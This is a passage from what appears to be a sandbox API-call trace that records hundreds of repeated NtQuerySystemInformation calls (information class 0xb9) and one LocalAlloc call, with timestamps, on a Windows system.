Length=0x0, ResultLength=0x0) [0290.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217da60, Length=0x38, ResultLength=0x0) [0290.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d8e0, Length=0x20, ResultLength=0x0) [0290.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d860, Length=0x20, ResultLength=0x0) [0290.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d860, Length=0x20, ResultLength=0x0) [0290.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d860, Length=0x20, ResultLength=0x0) [0290.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217da60, Length=0x38, ResultLength=0x0) [0290.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d8e0, Length=0x20, ResultLength=0x0) [0290.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d870, Length=0x20, ResultLength=0x0) [0290.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d870, Length=0x20, ResultLength=0x0) [0290.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217db90, Length=0x28, ResultLength=0x0) [0290.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217db90, Length=0x28, ResultLength=0x0) [0290.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217db90, Length=0x28, ResultLength=0x0) [0290.368] LocalAlloc (uFlags=0x0, uBytes=0x5a) returned 0x26949b9cd60 [0290.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217db90, Length=0x28, ResultLength=0x0) [0290.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217db90, Length=0x28, ResultLength=0x0) [0290.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217db90, Length=0x28, ResultLength=0x0) [0290.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217db10, Length=0x20, ResultLength=0x0) [0290.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217db10, Length=0x20, ResultLength=0x0) [0290.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217db90, Length=0x28, ResultLength=0x0) [0290.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217db10, Length=0x20, ResultLength=0x0) [0290.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217db10, Length=0x20, ResultLength=0x0) [0290.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217db90, Length=0x28, ResultLength=0x0) [0290.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217db90, Length=0x28, ResultLength=0x0) [0290.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dcd0, Length=0x48, ResultLength=0x0) [0290.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.319] NtQuerySystemInformation 